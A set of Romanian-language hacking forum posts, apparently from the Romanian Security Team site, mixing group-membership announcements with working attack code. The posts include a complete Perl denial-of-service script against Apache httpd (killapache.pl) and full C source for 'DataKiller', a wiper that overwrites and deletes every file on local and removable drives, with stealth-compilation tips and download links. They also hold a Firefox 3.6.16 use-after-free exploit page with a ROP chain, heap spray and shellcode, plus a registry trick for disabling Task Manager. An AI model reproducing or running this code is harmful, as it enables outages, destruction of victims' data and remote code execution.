Nytro

Offtopic, nu stricati topicul.

Update: DataKiller v0.2 Ce e nou: - Safe file delete Vedeti primul post pentru mai multe informatii.

Semnaturi nu stiu daca are rost, dar daca cineva are nevoie de grafica, de imagini sau altceva pentru un proiect, cred ca Designerii vor fi bucurosi sa ajute.

Si uite asa avem un nou VIP.

Apache httpd Remote Denial of Service (memory exhaustion) #Apache httpd Remote Denial of Service (memory exhaustion) #By Kingcope #Year 2011 # # Will result in swapping memory to filesystem on the remote side # plus killing of processes when running out of swap space. # Remote System becomes unstable. # use IO::Socket; use Parallel::ForkManager; sub usage { print "Apache Remote Denial of Service (memory exhaustion)\n"; print "by Kingcope\n"; print "usage: perl killapache.pl <host> [numforks]\n"; print "example: perl killapache.pl www.example.com 50\n"; } sub killapache { print "ATTACKING $ARGV[0] [using $numforks forks]\n"; $pm = new Parallel::ForkManager($numforks); $|=1; srand(time()); $p = ""; for ($k=0;$k<1300;$k++) { $p .= ",5-$k"; } for ($k=0;$k<$numforks;$k++) { my $pid = $pm->start and next; $x = ""; my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "80", Proto => 'tcp'); $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n"; print $sock $p; while(<$sock>) { } $pm->finish; } $pm->wait_all_children; print ":pPpPpppPpPPppPpppPp\n"; } sub testapache { my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "80", Proto => 'tcp'); $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n"; print $sock $p; $x = <$sock>; if ($x =~ /Partial/) { print "host seems vuln\n"; return 1; } else { return 0; } } if ($#ARGV < 0) { usage; exit; } if ($#ARGV > 1) { $numforks = $ARGV[1]; } else {$numforks = 50;} $v = testapache(); if ($v == 0) { print "Host does not seem vulnerable\n"; exit; } while(1) { killapache(); } Pare promitator... Sursa: Apache httpd Remote Denial of Service (memory exhaustion)

Florin Salam - Cap si pajura 2011 (Live Club One Million Timisoara) - YouTube

La optiunea de excludere a partitiei cu Windows m-am gandit. Dar pot fi si alte fisiere pe acolo. Cred ca voi pune optiune de ocolire ?:/Windows si ?:/Program Files, ca in Documents And Settings se mai afla date, la fel si /Users pe Windows 7. Dar cred ca ma complic degeaba. O sa ma mai gandesc si cand mai am timp liber mai lucrez la el.

Cine vrea sa fie recrutat in acel grup, add la "grupuri_rst" si discutam. Si vedem si cat intelege din ceea ce face.

Nu "o sa faca furori", doar ca va fi mai complex si mai util. Astept idei si sugestii, cat despre implementare, vor putea sa contribuie cei din grupul C/C++ coder.

Nu, VIP e altceva.

Da, sunt sigur ca daca vad "[G] Java Programmer" in loc de "Java Prgrammers", chiar daca e prima oara cand intra pe RST vor zice: "Aaaa, da ma, acum stiu, e cu grupurile alea de care nu stiu, dar "G" vine de la grupuri si m-a lamurit". Nu are rost, poate o sa pun un Italic, un stil aparte la ele, deocamdata nu e necesar.

"Registered user" != "Java Programmer" != "VIP" Si daca pui un copil care nu stie sa citeasca sa se uite, o sa isi dea seama ca nu e acelasi lucru. PS: Cei cu rangul de VIP au acum statusul grupului (Linux...), dar si permisiunile de VIP.

Nume: DataKiller Descriere: Sterge toate fisierele Autor: Grupul C/C++ Coder @ Romanian Security Team Marime: 8.5 KB Atentie! Nu rulati acest executabil, va incerca sa stearga toate fisierele! O descriere mai amanantita: acum ceva timp, mi-a cerut cineva un astfel de program si mi s-a parut o idee interesanta. Este a doua versiune, am de gand sa ii pun cateva optiuni utile (sa stearga doar pozele de exemplu). Ce e nou: - Safe File Delete Nu e nimic complicat, dar poate fi foarte util. Singurul lucru pe care il face e sa inlocuiasca toate datele din fisierele care urmeaza sa fie sterge cu NULL. Astfel, un fisier ce contine "aaa", va contine "NULL,NULL,NULL" apoi va fi sters. In caz ca nu stiati, cand dati Delete la un fisier, datele din fisier nu sunt sterse, ci e stearsa doar legatura catre acel fisier, dar datele raman pe hard disk si pot fi recuperate partial sau total. Cu aceasta optiune, nu vor mai putea fi recuperate, insa executia programului va fi MULT mai lunga si va consuma mai multe resurse. Va dura peste 30 de minute, depinde de marimea si nr. fisierelor de pe calculator. Eu estimez ca ar dura cam 1-2 ore o executie. Si oricum am cateva idei de viitor. E singura optiune implementata, dar dupa cum se vede in sursa mai am cateva idei de pus in aplicare. Codul sursa nu are rost sa il ascund, problema ar fi faptul ca nu e extraodrinar scris, nu m-am straduit sa fac optimizari. DataKiller.c /* Name: DataKiller.c Description: Delete all deleteable files Authors: Grupul C/C++ Coder @ Romanian Security Team Info: Nu toate optiunile au fost implementate */ #include <windows.h> #include <stdio.h> #include <stdlib.h> #include <string.h> /* Setari definite de utilizator - puteti sa modificati valorile */ int safe_file_delete = 1; /* "-[n]sf" Sterge fisierul fara sa poata fi recuperat */ int safe_delete_file_info = 0; /* "-[n]si" Sterge si informatiile despre fisier */ int delete_all_files = 1; /* "-[n]da" Sterge toate fisierele */ int delete_all_images = 1; /* "-[n]di" Sterge toate imaginile */ int delete_all_media = 1; /* "-[n]dm" Sterge toate melodiile, videoclipurile */ int delete_all_documents = 1; /* "-[n]dd" Sterge toate documentele */ int exclude_windows_partition = 0; /* "-[n]ew" Nu sterge nimic de pe partita cu Windows-ul */ /* Marimi buffere */ #define VOLNAME_SIZE 4 #define VOLBUFFER_SIZE 1337 #define DIRBUFFER_SIZE 255 #define FILENAME_SIZE 31337 /* Contoare pentru nr. de fisiere si de foldere - statistici */ int nr_files = 0; int nr_directories = 0; int deleted_files = 0; int deleted_directories = 0; /* Functia inlocuieste datele dintr-un fisier cu 0 (NULL) */ void NullFile(const char *fisier) { HANDLE hFisier = NULL; DWORD file_size = 0; DWORD file_size_2 = 0, written = 0; unsigned char *buf = NULL; SetFileAttributes(fisier, FILE_ATTRIBUTE_NORMAL); hFisier = CreateFile(fisier, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_ARCHIVE | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM, NULL); if(hFisier != INVALID_HANDLE_VALUE) { file_size = GetFileSize(hFisier, &file_size_2); /* NULL-uim fisierul, ca sa nu poata fi recuperate datele */ buf = (unsigned char *)malloc(file_size); memset(buf, 0, file_size); WriteFile(hFisier, buf, file_size, &written, NULL); free(buf); CloseHandle(hFisier); } } /* Functie recursiva, sterge folderele si fisierele */ void DeleteFiles(char *directory) { WIN32_FIND_DATA file_data; HANDLE hFisier; int new_file = 1; char dir_buffer[DIRBUFFER_SIZE] = {0}; char file_name[FILENAME_SIZE] = {0}; char new_dir[DIRBUFFER_SIZE] = {0}; /* Formam sirul de caractere pentru FindFirstFile */ memset(&file_data, 0, sizeof(WIN32_FIND_DATA)); sprintf(dir_buffer, "%s*", directory); hFisier = FindFirstFile(dir_buffer, &file_data); /* Parcurgem folderul */ while(hFisier != INVALID_HANDLE_VALUE && new_file) { sprintf(file_name, "%s%s", directory, file_data.cFileName); /* Daca e folder */ if(GetFileAttributes(file_name) & ~(FILE_ATTRIBUTE_DIRECTORY ^ 0xFFFFFFFF) && (GetFileAttributes(file_name) != (unsigned)-1)) { sprintf(new_dir, "%s\\", file_name); /* Evitam "." si ".." */ if(file_name[strlen(file_name) - 1] != '.') { nr_directories++; DeleteFiles(new_dir); if(RemoveDirectory(new_dir)) deleted_directories++; } } /* Daca e fisier */ else { nr_files++; if(safe_file_delete) NullFile(file_name); if(DeleteFile(file_name)) deleted_files++; } /* Trecem la urmatorul fisier/folder */ new_file = FindNextFile(hFisier, &file_data); } FindClose(hFisier); } int main(int argc, char *argv[]) { char *dir_buffer = NULL; char **drives = NULL; int dir_buf_size = 0, nr_drives = 0, i = 0, a = 0; /* Verificam parametrii din linia de comanda */ if(argc > 1) { for(a = 1; a < argc; a++) { /* Luam fiecare parametru in parte */ if(strcmp(argv[a], "-sf") == 0) safe_file_delete = 1; else if(strcmp(argv[a], "-nsf") == 0) safe_file_delete = 0; else if(strcmp(argv[a], "-si") == 0) safe_delete_file_info = 1; else if(strcmp(argv[a], "-nsi") == 0) safe_delete_file_info = 0; else if(strcmp(argv[a], "-da") == 0) delete_all_files = 1; else if(strcmp(argv[a], "-nda") == 0) delete_all_files = 0; else if(strcmp(argv[a], "-di") == 0) delete_all_images = 1; else if(strcmp(argv[a], "-ndi") == 0) delete_all_images = 0; else if(strcmp(argv[a], "-dm") == 0) delete_all_media = 1; else if(strcmp(argv[a], "-ndm") == 0) delete_all_media = 0; else if(strcmp(argv[a], "-dd") == 0) delete_all_documents = 1; else if(strcmp(argv[a], "-ndd") == 0) delete_all_documents = 0; else if(strcmp(argv[a], "-ew") == 0) exclude_windows_partition = 1; else if(strcmp(argv[a], "-new") == 0) exclude_windows_partition = 0; } } /* Alocam memorie */ dir_buffer = (char *)malloc(VOLBUFFER_SIZE); dir_buf_size = GetLogicalDriveStrings(VOLBUFFER_SIZE, dir_buffer); nr_drives = dir_buf_size / VOLNAME_SIZE; drives = (char **)malloc(sizeof(char *) * nr_drives); /* Parcurgem volumele */ for(i = 0; i < dir_buf_size / VOLNAME_SIZE; i++) { drives[i] = (char *)malloc(VOLNAME_SIZE); strncpy(drives[i], dir_buffer + i * VOLNAME_SIZE, VOLNAME_SIZE); printf("Drive: %s: %d\n", drives[i], GetDriveType(drives[i])); if(GetDriveType(drives[i]) == DRIVE_FIXED || GetDriveType(drives[i]) == DRIVE_REMOVABLE) DeleteFiles(drives[i]); } printf("Foldere: %d\nFisiere: %d\n", nr_directories, nr_files); printf("Foldere sterse: %d\nFisiere sterse: %d\n", deleted_directories, deleted_files); /* Eliberam memoria */ for(i = 0; i < nr_drives; i++) free(drives[i]); free(drives); free(dir_buffer); return 0; } Pastebin: [C] DataKiller.c - Pastebin.com Daca vreti sa il compilati, compilati-l cu optiunea "-mwindows" pentru linker, astfel incat sa nu se deschida CMD-ul cand va fi rulat. Eu l-am compilat si cu optimizari pentru marime "-s" si "-Os". Utilizare? Cred ca o sa ii gasiti voi una, cred ca vor fi destui care il vor gasi "util". Partea nasoala, din cate observ, e ca e detectabil... http://www.virustotal.com/file-scan/report.html?id=b0d3d314fa0de3e4041e16525017a7960641a089cd7bf5a887ccb9ec53d935df-1313949171 O sa lucrez si la acest aspect. Ideea e ca il puteti compila din sursa, sa nu credeti ca am postat altceva. Download: http://www.girlshare.ro/2529741.5 http://www.speedyshare.com/files/29969756/DataKiller.exe http://www.megaupload.com/?d=S88LSQH1 http://www.mediafire.com/?ti4gvi9nnj7g91q http://www.multiupload.com/DOTY3PVTX3 Stiu, e banal, stupid si non-etic, eu nu am nevoie de asa ceva dar unii poate au nevoie. Fiti rai!

Keyscrambler?

Noi membri ai grupurilor: - sql.breaker - PHP - Usr6 - Malware analyzer - Gabriel87 - Designer - gigaevil - C++ Coder Modificare temporara: grupul Web Designer face parte din grupul Designer. Lista de pana acum cu toti: PHP Coder - Synthesis - Lider - GarryOne - Membru - sql.breaker - Membru Java Programmer - M2G - Lider - em - Membru Linux Administrator - Zatarra - Lider - BGS - Membru - Spock - Membru - adonisslanic - Membru VB6 Programmer - Wav3 - Lider Malware analyzer - Paul4Games - Usr6 Windows Administrator - wildchild - Lider Pyhon Coder - cmin - Lider - python3 - Membru Designer - Surge - Lider - robertutzu - Gabriel87 .NET Programmer - Alien - Lider C/C++ Programmer - Nytro - Lider - Pantrunjel - Membru - gigaevil - Membru Toti liderii sunt rugati sa ma contacteze sa discutam, legate de proiecte si de planuri de viitor.

Eu am incercat pe Windows 7 dar Mozilla 3.6.15 si a crash-uit fara sa execute shellcode-ul.

Wordpress plugins exploits Author: Exploits by Miroslav Stampar &laquo Exploit Database Lista: WordPress WP DS FAQ plugin <= 1.3.2 SQL Injection Vulnerability WordPress WP Forum plugin <= 1.7.8 SQL Injection Vulnerability WordPress Ajax Gallery plugin <= 3.0 SQL Injection Vulnerability WordPress Global Content Blocks plugin <= 1.2 SQL Injection Vulnerability WordPress Allow PHP in Posts and Pages plugin <= 2.0.0.RC1 SQL Injection Vulnerability WordPress Menu Creator plugin <= 1.1.7 SQL Injection Vulnerability WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability WordPress Contus HD FLV Player plugin <= 1.3 SQL Injection Vulnerability WordPress WP Symposium plugin <= 0.64 SQL Injection Vulnerability WordPress Easy Contact Form Lite plugin <= 1.0.7 SQLi WordPress OdiHost Newsletter plugin <= 1.0 SQL Injection Vulnerability Sursa: Exploits by Miroslav Stampar &laquo Exploit Database

Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7) <html> <body> <applet code="rubik.class" width=140 height=140></applet> <p><b>Mozilla mChannel Object use after free</b><br /> - Found by regenrecht<br /> - MSF exploit by Rh0<br /> - Win 7 fun version by mr_me</p> <!-- Notes: - This exploit requires <= java 6 update 25. - optimized heap spray and still works on mutiple tabs as the spray is large enough to hit the 0x10000000 block. - If you really want the class file you can get it here: http://javaboutique.internet.com/Rubik/rubik.class, but java still loads without it. - Tested on windows 7 ultimate (latest updates). - http://bit.ly/qD4Jkc --> <object id="d"><object> <script type="text/javascript"> function trigger(){ alert('ready?'); fakeobject = document.getElementById("d"); // allocate the object fakeobject.QueryInterface(Components.interfaces.nsIChannelEventSink); // append to the objects available functions fakeobject.onChannelRedirect(null,new Object,0); // free it /* fill the object with a fake vtable reference just use the start of a block for simplicity and use \x00 because it expands to a NULL so that when we have have the CALL DWORD PTR DS:[ECX+18], it will point to 0x10000000 */ fakevtable = unescape("\x00%u1000"); var rop = ""; // 3 instructions to pivot cleanly rop += unescape("%u1033%u6d7f"); // 0x6D7F1033 -> MOV EAX,[ECX] / PUSH EDI / CALL [EAX+4] <jvm.dll> rop += unescape("%u10a7%u6d7f"); // 0x6D7F10A7 -> POP EBP / RETN <jvm.dll> rop += unescape("%u1441%u6d7f"); // 0x6D7F1441 -> XCHG EAX,ESP / RETN <jvm.dll> // generic rop taken from MSVCR71.dll (thanks to corelanc0d3r) rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN rop += unescape("%ua140%u7c37"); // 0x7c37a140 -> Make EAX readable rop += unescape("%u591f%u7c37"); // 0x7c37591f -> PUSH ESP / ... / POP ECX / POP EBP / RETN rop += unescape("%uf004%ubeef"); // 0x41414141 -> EBP (filler) rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN rop += unescape("%ua140%u7c37"); // 0x7c37a140 -> *&VirtualProtect() rop += unescape("%u30ea%u7c35"); // 0x7c3530ea -> MOV EAX,[EAX] / RETN rop += unescape("%u6c0b%u7c34"); // 0x7c346c0b -> Slide, so next gadget would write to correct stack location rop += unescape("%u6069%u7c37"); // 0x7c376069 -> MOV [ECX+1C],EAX / POP EDI / POP ESI / POP EBX / RETN rop += unescape("%uf00d%ubeef"); // 0x41414141 -> EDI (filler) rop += unescape("%uf00d%ubeef"); // 0x41414141 -> will be patched at runtime (VP), then picked up into ESI rop += unescape("%uf00d%ubeef"); // 0x41414141 -> EBX (filler) rop += unescape("%u6402%u7c37"); // 0x7c376402 -> POP EBP / RETN rop += unescape("%u5c30%u7c34"); // 0x7c345c30 -> ptr to 'push esp / ret ' rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN rop += unescape("%udfff%uffff"); // 0xfffffdff -> size 0x00000201 -> ebx, modify if needed rop += unescape("%u1e05%u7c35"); // 0x7c351e05 -> NEG EAX / RETN rop += unescape("%u4901%u7c35"); // 0x7c354901 -> POP EBX / RETN rop += unescape("%uffff%uffff"); // 0xffffffff -> pop value into ebx rop += unescape("%u5255%u7c34"); // 0x7c345255 -> INC EBX / FPATAN / RETN rop += unescape("%u2174%u7c35"); // 0x7c352174 -> ADD EBX,EAX / XOR EAX,EAX / INC EAX / RETN rop += unescape("%ud201%u7c34"); // 0x7c34d201 -> POP ECX / RETN rop += unescape("%ub001%u7c38"); // 0x7c38b001 -> RW pointer (lpOldProtect) (-> ecx) rop += unescape("%ub8d7%u7c34"); // 0x7c34b8d7 -> POP EDI / RETN rop += unescape("%ub8d8%u7c34"); // 0x7c34b8d8 -> ROP NOP (-> edi) rop += unescape("%u4f87%u7c34"); // 0x7c344f87 -> POP EDX / RETN rop += unescape("%uffc0%uffff"); // 0xffffffc0 -> value to negate, target value : 0x00000040, target: edx rop += unescape("%u1eb1%u7c35"); // 0x7c351eb1 -> NEG EDX / RETN rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN rop += unescape("%u9090%u9090"); // 0x90909090 -> NOPS (-> eax) rop += unescape("%u8c81%u7c37"); // 0x7c378c81 -> PUSHAD / ADD AL,0EF / RETN sc = rop; // nice big 'calccode' (0x400 bytes) sc += unescape("%uf869%u0d93%u3578%u7704%u902d%u432c%u249f%uba46%u983c%ub299%ufe13%uf9c0"+ "%u784f%u2f7c%u4fa9%u7a76%ub235%u7027%u2f73%ub937%ud380%u0de3%u157f%u93b5%ubfba%u4291"+ "%ufc03%u3d40%u729f%u9b24%u7e7b%u3814%u8dfd%u2592%u892c%u01e0%uf9d0%u41b1%uf731%u75e1"+ "%ubb3f%u7d79%uf811%u6734%u992d%u4b49%u6690%u71b4%ua847%u094a%u05eb%u4eb3%ud119%u3ae2"+ "%u0cd6%u96be%ub0b8%u4697%u98b7%u1048%ub6d5%u1c04%uf56b%u201d%u74d4%u773c%u727f%u7b7d"+ "%u7e7c%u7571%u9743%u1c49%ubb90%u4e74%u3cb5%ua993%ub09f%u73ba%ud522%u8d4f%u98be%u3304"+ "%u88f5%u43d4%u92b4%u7ab8%ud60a%u1da8%ub14a%uf82a%ub7b2%u2c41%u3b79%u05fd%u85b9%u76e0"+ "%ufc1a%u4b35%u9647%u8134%u24e1%u8366%u48e3%u4214%u870c%uebd2%u3f78%u9bb3%uff1b%uc1c7"+ "%u67e2%u910d%u70b6%u4615%u2d25%u772f%u993d%ubf27%u1240%u37f9%u7a77%u7279%u9167%u2f76"+ "%ubeb5%u15b6%u7d7f%u303f%u40e3%u11b7%u19e0%u39e2%u04fc%ua8ba%u991d%ud518%u41bb%u78bf"+ "%u9834%ub8b4%u270d%u8390%u4ffd%u31b1%u70e1%u4349%u86b3%u9ff5%u331c%ud6f7%u667e%ua93c"+ "%u9b8d%uf687%u46d4%u4293%u7314%u3d35%u257b%u4a97%u37b0%u2496%u4b74%u2c75%u92b9%u2d7c"+ "%u4748%u694e%uebd3%uf829%u08b2%u71f9%u790c%u717a%u227b%u05e2%u3cb8%u9fb6%u7896%uf903"+ "%u217e%ubfd6%u4e91%u3db3%u777c%u0d76%u7372%u1541%ub2ba%u342c%u9048%ud484%ue189%u4f05"+ "%u677f%ubbb9%u4370%u7d74%u1c75%ua92d%u1342%u93f5%u090c%u12e3%u92f8%u662f%u49b0%u8d99"+ "%ub44b%uc688%uebc0%u474a%u2b37%u46fc%u0a9b%u04fd%ue086%u2740%ua8be%u35b5%u3f97%u24b1"+ "%u1498%u25b7%u7c1d%u0b7f%ub1d5%u410c%u1047%u7deb%ue228%u7672%u7e78%u7177%u1b73%ufdd0"+ "%u3bb2%u3ce0%u7515%u4e25%uf52a%u70b9%u3540%u9993%ubf2c%u85b5%u79fc%u3474%u377b%ud26b"+ "%ubed5%u982d%ue33a%u9243%u7a14%ub33d%u9048%ubb8d%u9b24%u2f46%u20b0%uf9d1%ub897%ua866"+ "%ub4b7%ua996%ub642%ue180%u4a27%u1a77%u9fd4%u017e%u18eb%u8cf8%ubad6%u1c7c%u497f%u7467"+ "%u784f%u914b%u3271%u04e0%u0d7a%u1d79%u397b%ue2c1%u7d05%u933f%u70b1%ub324%u3cb8%u6642"+ "%u961c%u9b27%u72bf%ue338%ub53d%u3040%ub4fc%u7646%uf525%u029f%ubad5%u0cf8%u3fa9%u7514"+ "%ubb0d%u23e1%ub9d6%u05d4%u378d%ub243%ub735%u1573%u4798%u2c48%ua84b%ufd41%u4f2d%u1db6"+ "%u9049%uf981%ube04%u3491%u924e%ub097%u2f4a%u9967%u8dbe%u5994%udbe7%ud9da%u2474%u58f4"+ "%uc929%u33b1%u7031%u8312%u04c0%ufd03%ubb9a%u0112%ub24a%uf9dd%ua58b%u1c54%uf7ba%u5503"+ "%uc7ef%u3b40%ua31c%uaf05%uc197%uc081%u6f10%ueff4%u41a1%ua338%uc362%ub9c4%u23b6%u72f4"+ "%u22cb%u6e31%u7624%ue5ea%u6797%ubb9f%u892b%ub04f%uf114%u06ea%u4be0%u56f4%uc759%u4ebe"+ "%u8fd1%u6f1e%ucc36%u2663%u2733%ub917%u7995%u88d8%ud6d9%u25e7%u27d4%u812f%u5207%uf25b"+ "%u65ba%u8998%ue360%u293d%u53e2%uc8e6%u0527%uc66d%u418c%uca29%u8513%uf641%u2898%u7f86"+ "%u0eda%u2402%u2fb8%u8013%u4f6f%u6c43%uf5cf%u9e0f%u8f04%uf44d%u1ddb%ub1e8%u1ddc%u91f3"+ "%u2cb4%u7e78%ub0c2%u3bab%ufb3c%u6df6%ua2d5%u2c62%u54b8%u7259%ud6c5%u0a68%uc632%u0f18"+ "%u407e%u7df0%u25ef%ud2f6%u6c10%ub595%uec82%u5074%u9623%u4188"); // create a string with a ptr to the offset of our rop // used 0x1000001c to accomidate 0x18 + 0x4 (1st rop gadget) var filler = unescape("%u001c%u1000"); while(filler.length < 0x100) {filler += filler;} /* create a string with 0x18 bytes at the start containing ptr's to the rop. This is to account for the vtable offset (0x18) -> 'CALL DWORD PTR DS:[ECX+18]' Then fill with sc + junk */ var chunk = filler.substring(0,0x18/2); chunk += sc; chunk += filler; // create a string of size 64k in memory that contains sc + filler var heapblock = chunk.substring(0,0x10000/2); // keep adding more memory that contains sc + filler to reach 512kB while (heapblock.length<0x80000) {heapblock += heapblock;} /* using a final string of 512kB so that the spray is fast but ensuring accuracy - sub the block header length (0x24) - sub 1/4 of a page for sc (0x400) - sub the string length (0x04) - sub the null byte terminator */ var finalspray = heapblock.substring(0,0x80000 - sc.length - 0x24/2 - 0x4/2 - 0x2/2); // optimised spray, precision can still be reliable even with tabs. // force allocation here of 128 blocks, using only 64MB of memory, speeeeeeed. arrayOfHeapBlocks = new Array() for (n=0;n<0x80;n++){ arrayOfHeapBlocks[n] = finalspray + sc; } } trigger(); </script> </body> </html> Are cineva o versiune mai veche de Mozilla sa il testeze? Daca nu uit il testez eu cand ajung acasa, cred ca sunt destui care au versiuni vechi de Mozilla. Sursa: Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)

Depinde de fiecare, eu unu m-as multumi cu asa ceva, eu am nevoie de maxim 1 GB RAM, un procesor de 2.5 GHz si o placa video de 2 lei. Dar eu nu ma joc, decat din an in Paste un Counter-Strike. Daca nu esti gamer si nu vrei cine stie ce de la un calculator, cum eu de exemplu nu vreau, e bun.

Nu imi plac prostiile astea, poti pune la status pe messenger sau pe Facebook, nu aici.

Ba da, e mult mai complex acela si mai sunt si alte solutii, eu cautam pe cineva cu care sa discut astfel de lucruri si acest program e un bun punct de plecare.

Mai pune un link. PS: O sa te stresez sa imi dai bucati din sursa si am sa iti pun cateva intrebari

Foarte multe exemple pentru diferite actiuni. Exemple: using System; public class HelloWorld { public static void Main(string[] args) { Console.Write("Hello World!"); } } using System; namespace PlayingAround { class ReadAll { public static void Main(string[] args) { string contents = System.IO.File.ReadAllText(@"C:\t1"); Console.Out.WriteLine("contents = " + contents); } } } public static string getFileAsString(string fileName) { StreamReader sReader = null; string contents = null; try { FileStream fileStream = new FileStream(fileName, FileMode.Open, FileAccess.Read); sReader = new StreamReader(fileStream); contents = sReader.ReadToEnd(); } finally { if(sReader != null) { sReader.Close(); } } return contents; } using System; namespace PlayingAround { class ReadAll { public static void Main(string[] args) { string[] lines = System.IO.File.ReadAllLines(@"C:\t1"); Console.Out.WriteLine("contents = " + lines.Length); Console.In.ReadLine(); } } } StreamReader sr = new StreamReader("fileName.txt"); string line; while((line= sr.ReadLine()) != null) { Console.WriteLine("xml template:"+line); } if (sr != null)sr.Close(); //should be in a "finally" or "using" block using System; namespace PlayingAround { class ReadAll { public static void Main(string[] args) { string myText = "Line1" + Environment.NewLine + "Line2" + Environment.NewLine; System.IO.File.WriteAllText(@"C:\t2", myText); } } } using System; using System.IO; public class WriteFileStuff { public static void Main() { FileStream fs = new FileStream("c:\\tmp\\WriteFileStuff.txt", FileMode.OpenOrCreate, FileAccess.Write); StreamWriter sw = new StreamWriter(fs); try { sw.WriteLine("Howdy World."); } finally { if(sw != null) { sw.Close(); } } } } In fine, sunt foarte multe cu sintaxa evidentiata (syntax highlight, pe romaneste): http://www.fincher.org/tips/Languages/csharp.shtml

Prin Google, nu stiu Delphi: Disable LogOff, TaskManager and ShutDown on Win NT systems (2000/XP) Task Manager - Delphi Pages Forums Trebuie scrisa in Registry la "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" cheia "DisableTaskMgr" cu valoarea 1.

Cei cu care nu am mai discutat, mai exact cei care nu m-ati bagat in lista, dati un semn si discutam.